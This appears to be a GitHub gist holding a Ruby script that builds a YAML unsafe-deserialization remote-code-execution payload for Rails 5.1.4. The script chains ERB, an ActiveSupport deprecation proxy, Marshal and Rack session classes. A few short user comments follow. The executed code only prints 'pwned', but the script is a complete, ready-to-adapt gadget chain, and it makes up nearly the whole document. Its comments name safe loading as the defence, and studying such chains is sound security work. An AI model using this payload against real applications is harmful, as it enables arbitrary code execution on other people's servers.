Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml' | |
require 'base64' | |
require 'erb' | |
# Minimal stand-ins for the ActiveSupport classes the serialized object refers
# to. Marshal.dump records only the class path and the instance variables, so
# the real gem does not need to be loaded to produce the stream. (In Rails,
# ActiveSupport is a module; these stubs exist only for building the stream.)
class ActiveSupport | |
  class Deprecation | |
    # The stub carries just the @silenced flag into the serialized object.
    def initialize() | |
      @silenced = true | |
    end | |
    # Holds a wrapped instance and the name of the method to forward to.
    # NOTE: the ivar assignment order is the order Marshal writes them in,
    # so it must not be reordered if the emitted bytes are to stay identical.
    class DeprecatedInstanceVariableProxy | |
      def initialize(instance, method) | |
        @instance = instance | |
        @method = method | |
        @deprecator = ActiveSupport::Deprecation.new | |
      end | |
    end | |
  end | |
end | |
# Ruby source planted as the ERB template body. ERB#result evaluates the
# source held in @src, so this is what would run if the chain were ever
# triggered; the demo only prints a marker.
code = <<-EOS | |
puts "pwned" | |
EOS | |
# ERB.allocate skips ERB#initialize, so the template source and a line number
# are set directly as instance variables.
erb = ERB.allocate | |
erb.instance_variable_set :@src, code | |
erb.instance_variable_set :@lineno, 1337 | |
# Wrap the ERB object in the proxy; :result names the method it forwards to.
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
# Marshal the proxy and base64 it onto a single line. This value is
# interpolated into the HTTP_COOKIE entry of the YAML document below; it is a
# Marshal stream, so any consumer that Marshal.loads the cookie rebuilds the
# proxy -- a second untrusted-deserialization point besides the YAML itself.
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
# The outer document relies on !ruby/object tags. Those are only honored by an
# unsafe loader (Psych's YAML.load before Psych 4 / Ruby 3.1). YAML.safe_load,
# or Psych 4's YAML.load, rejects them unless the classes are explicitly
# permitted -- that is the defensive fix for any code that parses untrusted
# YAML. `<<-PAYLOAD` interpolates, so #{payload} is the base64 string above;
# `payload` is then reassigned to the full YAML text.
payload = <<-PAYLOAD | |
--- | |
!ruby/object:Gem::Requirement | |
requirements: | |
!ruby/object:Rack::Session::Abstract::SessionHash | |
req: !ruby/object:Rack::Request | |
env: | |
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
id: 'hi from espr' | |
HTTP_COOKIE: "a=#{payload}" | |
store: !ruby/object:Rack::Session::Cookie | |
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
key: a | |
secrets: [] | |
exists: true | |
loaded: false | |
PAYLOAD | |
# Print the finished YAML document to stdout.
puts payload |
@RicterZ If you load untrusted YAML without safe mode, you have a security issue regardless of this payload.
g0rx
commented
Sep 13, 2018
RicterZ kinda off; the problem started in 2013, but it seems new code still loads untrusted YAML — too bad.
RicterZ commented Nov 21, 2017
A 0-day? I couldn't find any information about this security issue on Rails official website or Github.